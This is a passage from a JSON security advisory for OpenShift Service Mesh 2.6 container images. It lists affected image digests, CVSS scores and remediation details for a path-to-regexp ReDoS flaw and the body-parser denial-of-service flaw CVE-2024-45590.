"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
